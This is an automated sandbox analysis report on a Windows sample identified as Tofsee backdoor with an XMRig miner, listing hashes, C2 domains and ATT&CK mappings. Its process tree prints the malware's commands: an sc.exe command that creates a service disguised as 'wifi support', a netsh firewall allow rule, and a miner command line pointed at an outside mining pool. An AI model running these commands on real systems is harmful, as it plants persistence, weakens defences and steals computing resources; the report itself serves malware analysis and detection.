Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    19-06-2022 22:25

General

  • Target

    0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb.exe

  • Size

    307KB

  • MD5

    158378ad7bbc129f422b11949c2632cd

  • SHA1

    14937298efeff57bbcc374ffaf6def86c6217189

  • SHA256

    0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb

  • SHA512

    58aede7b4261c28dd2a919b364b2f0c9c4d77c54f234c9d88bbb59bc7e00a57cfa0438565b75ea91f7530a73be8b466acda70413e654a3ff054cc67961ad7ce5

Malware Config

Extracted

Family

tofsee

C2

svartalfheim.top

jotunheim.name

Signatures

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 2 IoCs
  • Creates new service(s) 1 TTPs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies data under HKEY_USERS 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb.exe
    "C:\Users\Admin\AppData\Local\Temp\0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3124
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jyrqavsx\
      2⤵
        PID:4936
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\sqomqumn.exe" C:\Windows\SysWOW64\jyrqavsx\
        2⤵
          PID:1908
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jyrqavsx binPath= "C:\Windows\SysWOW64\jyrqavsx\sqomqumn.exe /d\"C:\Users\Admin\AppData\Local\Temp\0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
          • Launches sc.exe
          PID:4480
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" description jyrqavsx "wifi internet conection"
          2⤵
          • Launches sc.exe
          PID:3256
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" start jyrqavsx
          2⤵
          • Launches sc.exe
          PID:4780
        • C:\Windows\SysWOW64\netsh.exe
          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
          2⤵
          • Modifies Windows Firewall
          PID:4588
      • C:\Windows\SysWOW64\jyrqavsx\sqomqumn.exe
        C:\Windows\SysWOW64\jyrqavsx\sqomqumn.exe /d"C:\Users\Admin\AppData\Local\Temp\0faef9ad6868b6da2b75cccd3970cbf9d23365a7b2052d66424960eb643b00bb.exe"
        1⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:4656
        • C:\Windows\SysWOW64\svchost.exe
          svchost.exe
          2⤵
          • Sets service image path in registry
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Modifies data under HKEY_USERS
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\SysWOW64\svchost.exe
            svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.60000 -p x -k -a cn/half
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4032

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      New Service

      1
      T1050

      Modify Existing Service

      1
      T1031

      Registry Run Keys / Startup Folder

      1
      T1060

      Privilege Escalation

      New Service

      1
      T1050

      Defense Evasion

      Modify Registry

      1
      T1112

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\sqomqumn.exe
        Filesize

        13.1MB

        MD5

        304b6dd0668e22f40db4e49e300d2df2

        SHA1

        1139b46546c4d198ee9cbd98b203c03c693809fd

        SHA256

        082030173dd3619cdeda470667f0437a9ea3c4af8d95ac18de08266151ad6929

        SHA512

        9d705a3cdab837369d761bc34f700f7f449b413fe7be1248fc84c9617751cdba7adfa2776869319af3e84eea36eec50fbbd63a37f29dd41a184daf9880030ca3

      • C:\Windows\SysWOW64\jyrqavsx\sqomqumn.exe
        Filesize

        13.1MB

        MD5

        304b6dd0668e22f40db4e49e300d2df2

        SHA1

        1139b46546c4d198ee9cbd98b203c03c693809fd

        SHA256

        082030173dd3619cdeda470667f0437a9ea3c4af8d95ac18de08266151ad6929

        SHA512

        9d705a3cdab837369d761bc34f700f7f449b413fe7be1248fc84c9617751cdba7adfa2776869319af3e84eea36eec50fbbd63a37f29dd41a184daf9880030ca3

      • memory/1908-134-0x0000000000000000-mapping.dmp
      • memory/3124-133-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/3124-130-0x0000000002E1E000-0x0000000002E2C000-memory.dmp
        Filesize

        56KB

      • memory/3124-131-0x00000000049C0000-0x00000000049D3000-memory.dmp
        Filesize

        76KB

      • memory/3124-141-0x0000000002E1E000-0x0000000002E2C000-memory.dmp
        Filesize

        56KB

      • memory/3124-143-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/3256-137-0x0000000000000000-mapping.dmp
      • memory/4032-175-0x0000000000C20000-0x0000000000D11000-memory.dmp
        Filesize

        964KB

      • memory/4032-169-0x0000000000000000-mapping.dmp
      • memory/4032-170-0x0000000000C20000-0x0000000000D11000-memory.dmp
        Filesize

        964KB

      • memory/4480-136-0x0000000000000000-mapping.dmp
      • memory/4588-140-0x0000000000000000-mapping.dmp
      • memory/4656-146-0x0000000002C99000-0x0000000002CA7000-memory.dmp
        Filesize

        56KB

      • memory/4656-148-0x0000000000400000-0x0000000002C6C000-memory.dmp
        Filesize

        40.4MB

      • memory/4720-157-0x0000000002410000-0x0000000002420000-memory.dmp
        Filesize

        64KB

      • memory/4720-149-0x0000000000350000-0x0000000000365000-memory.dmp
        Filesize

        84KB

      • memory/4720-150-0x0000000000350000-0x0000000000365000-memory.dmp
        Filesize

        84KB

      • memory/4720-151-0x0000000002200000-0x000000000240F000-memory.dmp
        Filesize

        2.1MB

      • memory/4720-154-0x00000000019D0000-0x00000000019D6000-memory.dmp
        Filesize

        24KB

      • memory/4720-142-0x0000000000000000-mapping.dmp
      • memory/4720-160-0x00000000025E0000-0x00000000025E5000-memory.dmp
        Filesize

        20KB

      • memory/4720-163-0x0000000007240000-0x000000000764B000-memory.dmp
        Filesize

        4.0MB

      • memory/4720-166-0x00000000025F0000-0x00000000025F7000-memory.dmp
        Filesize

        28KB

      • memory/4720-144-0x0000000000350000-0x0000000000365000-memory.dmp
        Filesize

        84KB

      • memory/4780-138-0x0000000000000000-mapping.dmp
      • memory/4936-132-0x0000000000000000-mapping.dmp